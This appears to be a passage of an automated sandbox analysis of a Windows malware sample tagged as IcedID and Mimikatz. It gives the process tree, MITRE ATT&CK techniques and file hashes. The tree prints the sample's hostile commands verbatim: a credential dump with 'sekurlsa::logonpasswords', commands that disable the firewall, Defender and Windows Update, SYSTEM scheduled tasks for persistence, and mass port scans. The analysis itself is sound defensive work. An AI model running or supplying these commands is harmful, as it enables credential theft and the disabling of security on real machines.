43 PID 2808 wrote to memory of 2988 2808 lbbuleg.exe 43 PID 2808 wrote to memory of 2988 2808 lbbuleg.exe 43 PID 2808 wrote to memory of 708 2808 lbbuleg.exe 45 PID 2808 wrote to memory of 708 2808 lbbuleg.exe 45 PID 2808 wrote to memory of 708 2808 lbbuleg.exe 45 PID 2808 wrote to memory of 708 2808 lbbuleg.exe 45 PID 2808 wrote to memory of 2640 2808 lbbuleg.exe 47 PID 2808 wrote to memory of 2640 2808 lbbuleg.exe 47 PID 2808 wrote to memory of 2640 2808 lbbuleg.exe 47 PID 2808 wrote to memory of 2640 2808 lbbuleg.exe 47 PID 2808 wrote to memory of 664 2808 lbbuleg.exe 49 PID 2808 wrote to memory of 664 2808 lbbuleg.exe 49 PID 2808 wrote to memory of 664 2808 lbbuleg.exe 49 PID 2808 wrote to memory of 664 2808 lbbuleg.exe 49 PID 664 wrote to memory of 1504 664 cmd.exe 51 PID 664 wrote to memory of 1504 664 cmd.exe 51 PID 664 wrote to memory of 1504 664 cmd.exe 51 PID 664 wrote to memory of 1504 664 cmd.exe 51 PID 664 wrote to memory of 1504 664 cmd.exe 51 PID 664 wrote to memory of 1504 664 cmd.exe 51 PID 664 wrote to memory of 1504 664 cmd.exe 51 PID 1504 wrote to memory of 1852 1504 wpcap.exe 52
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1020
-
C:\Windows\TEMP\whuvuatsq\tushzd.exe"C:\Windows\TEMP\whuvuatsq\tushzd.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\vswcughu\lbbuleg.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2768
-
-
C:\Windows\vswcughu\lbbuleg.exeC:\Windows\vswcughu\lbbuleg.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2812
-
-
-
C:\Windows\vswcughu\lbbuleg.exeC:\Windows\vswcughu\lbbuleg.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2716
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2564
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2624
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2672
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2988
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:708
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2640
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ebhtlebeq\bdhueueqm\wpcap.exe /S2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Windows\ebhtlebeq\bdhueueqm\wpcap.exeC:\Windows\ebhtlebeq\bdhueueqm\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
PID:1852 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3020
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
PID:1848 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1376
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
PID:1740 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1644
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2420 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2356
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1448 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2924 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:912
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1036 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1776 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ebhtlebeq\bdhueueqm\lvutgsgsu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ebhtlebeq\bdhueueqm\Scant.txt2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1092 -
C:\Windows\ebhtlebeq\bdhueueqm\lvutgsgsu.exeC:\Windows\ebhtlebeq\bdhueueqm\lvutgsgsu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ebhtlebeq\bdhueueqm\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ebhtlebeq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ebhtlebeq\Corporate\log.txt2⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:984 -
C:\Windows\ebhtlebeq\Corporate\vfshost.exeC:\Windows\ebhtlebeq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bswcnelsw" /ru system /tr "cmd /c C:\Windows\ime\lbbuleg.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3008 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bswcnelsw" /ru system /tr "cmd /c C:\Windows\ime\lbbuleg.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ugmgbtgdr" /ru system /tr "cmd /c echo Y|cacls C:\Windows\vswcughu\lbbuleg.exe /p everyone:F"2⤵PID:2012
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ugmgbtgdr" /ru system /tr "cmd /c echo Y|cacls C:\Windows\vswcughu\lbbuleg.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "aidbpiqqz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\whuvuatsq\tushzd.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:536 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "aidbpiqqz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\whuvuatsq\tushzd.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1260
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:268
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:3044
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2680
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2836
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2572
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1944
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2496
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2788
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1700
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2004
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:556
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3020
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:1376 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:1644 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:1272
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
PID:320 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
PID:2072 -
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:2920 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:2188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:2500
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:2156 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:1400
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
PID:1772 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:1512
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1504 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:1312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:764
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:1140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:1484
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2352 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2520
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:704
-
-
C:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exeC:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exe -accepteula -mp 1020 C:\Windows\TEMP\ebhtlebeq\1020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
C:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exeC:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exe -accepteula -mp 1104 C:\Windows\TEMP\ebhtlebeq\1104.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exeC:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exe -accepteula -mp 1168 C:\Windows\TEMP\ebhtlebeq\1168.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exeC:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exe -accepteula -mp 316 C:\Windows\TEMP\ebhtlebeq\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
C:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exeC:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exe -accepteula -mp 916 C:\Windows\TEMP\ebhtlebeq\916.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exeC:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exe -accepteula -mp 1860 C:\Windows\TEMP\ebhtlebeq\1860.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exeC:\Windows\TEMP\ebhtlebeq\syvsdbgfd.exe -accepteula -mp 2412 C:\Windows\TEMP\ebhtlebeq\2412.dmp2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ebhtlebeq\bdhueueqm\scan.bat2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1648 -
C:\Windows\ebhtlebeq\bdhueueqm\etwsuhquc.exeetwsuhquc.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
PID:2232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1152
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2012
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1224
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
C:\Windows\SysWOW64\huzbeq.exeC:\Windows\SysWOW64\huzbeq.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1732
-
C:\Windows\system32\taskeng.exetaskeng.exe {5561D630-0E5B-4106-A505-4CD2EEE29860} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2572
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\whuvuatsq\tushzd.exe /p everyone:F2⤵PID:1744
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2868
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\whuvuatsq\tushzd.exe /p everyone:F3⤵PID:2964
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\vswcughu\lbbuleg.exe /p everyone:F2⤵PID:1944
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2876
-
-
C:\Windows\system32\cacls.execacls C:\Windows\vswcughu\lbbuleg.exe /p everyone:F3⤵PID:2884
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\lbbuleg.exe2⤵PID:880
-
C:\Windows\ime\lbbuleg.exeC:\Windows\ime\lbbuleg.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1072
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\whuvuatsq\tushzd.exe /p everyone:F2⤵PID:1188
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2072
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\whuvuatsq\tushzd.exe /p everyone:F3⤵PID:1756
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\vswcughu\lbbuleg.exe /p everyone:F2⤵PID:2656
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2368
-
-
C:\Windows\system32\cacls.execacls C:\Windows\vswcughu\lbbuleg.exe /p everyone:F3⤵PID:2276
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\lbbuleg.exe2⤵PID:2432
-
C:\Windows\ime\lbbuleg.exeC:\Windows\ime\lbbuleg.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2280
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2884
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.6MB
MD541cfb4b9b2f0eb213e9dbf1278524db8
SHA1fb44dd4bd7601ed265f7fdbabfe5d5faf8f40c37
SHA2569b46303731c86d32b0d93d8186c17d5f99258bdb3b2111e638151817ce059d34
SHA512fc1be00c934ee8bc1ee156bd5eba23fa2b712d572ff2d3fa54ebcb683be6c255d5db5eefa0d85e936ff6a552af2640bb7c71cf4921bb8e36749cedc32aa87e0b
-
Filesize
1.4MB
MD58b36c61c2325ad9de5d5c9827fa43d37
SHA1257120f9864da7a912f05d7aa69e976ec107f4b6
SHA256bba983dd31272e572f820a5f8183f0bd5b3a3763555e56631f5c9a8df1969b3d
SHA512cf6ee9cd716fa4e54ccea7774ffd1d5e222776c7de8016e9170c5316a278efb4abf977fa409bfcb96b1ea5afe0ffdf3288126b13680c42eeb37de111837bd6dd
-
Filesize
1.3MB
MD53c5d8610794fa75dbab391c5c91c2ea7
SHA1c4a0f3e347bffb4cd63fde846a42d54efb02f25e
SHA256e0e3c3f13d0a63114f77a7227a2c836798b2342c397df5b4259348a52348d710
SHA512d72b9d1dd06eb757fa7cd4fb897633372c4bbda83a7aa52cb0509f600621d8fc07fcb620849644b54da889638379646092d299debd0998234c1eb64d8ec920ab
-
Filesize
5.3MB
MD5308774a630ed02ba4f86873fa826724f
SHA1005ef5fb67c20bc3b07b5ed405f42a9ddaf9355f
SHA256d429ca0b4ab18ffeff96601353c7598d2a8fe1a68b75d332eae913ae971871ca
SHA512f0f8a386c11cc25e411cb3c0b5574b4dae2d8de9491228061df4cdf75b482838bcb2384f62d6b875f2b2fe9a2e9f1e66f9b5067a772a196eb8f49ab4a4e8a35a
-
Filesize
6.8MB
MD525c7b29e0a5aae77163f7e490a206d4c
SHA14219c52690c7404c5968e538947245fd09b19331
SHA2561e63fec338769ea348c291aec31ce61ecf967ad8d1ec6030e14a82c01eb3c6ff
SHA512ef569280267df6a61ce5bb50af318edb1a68d5f6a19c0151ebc4d54a453bc67ec36e7da3d2261983f51216d46acc6ddda94072da9b7b1b5b96ee9b03053172b3
-
Filesize
4.1MB
MD5a2f8a4dee80b42fc6bbfb1c6b77b874a
SHA154a21d6ce3b0796dd7aa535d07a2e86b5ffea2ec
SHA2560a7c9719f8ce65aabed5af7259b0eb0692d2f08d72462eaa00cf48870ed6ee49
SHA512c6346e135b8d101ecfcac73a30eddc30dccdb772e51a3aff0b8b4287fc8dc4398cc6fc513b03b949c3b7b299444cca33cc165865f4c178fab237bbecf6be080a
-
Filesize
2.2MB
MD54fe19f3f98006f8bb79f16d66495dbdc
SHA190c6b2905004bd523098039091c949a9e932b586
SHA25630a64724c8c2b707e2e1a497d391b437261b7b7735c3ef918f731031ddd78a94
SHA512bfed6e0b04e21ec2edf3df55f93d291b7b468a0a7878b579d4cf88cf5cd42b83f8b1efeef61ba06666f43d344e37c6c5ef97abdc9d4b9f7f68bac40e2d80ba42
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
166B
MD5333990d828e5da238b0e6669ee09bef8
SHA103c425c156bc5ce2fc7611398eff5e8aec98a34e
SHA256635d21ced09e26f2fa54a7447ecf51a5a7fc1cb7a0ceff7178c7ef75c372d404
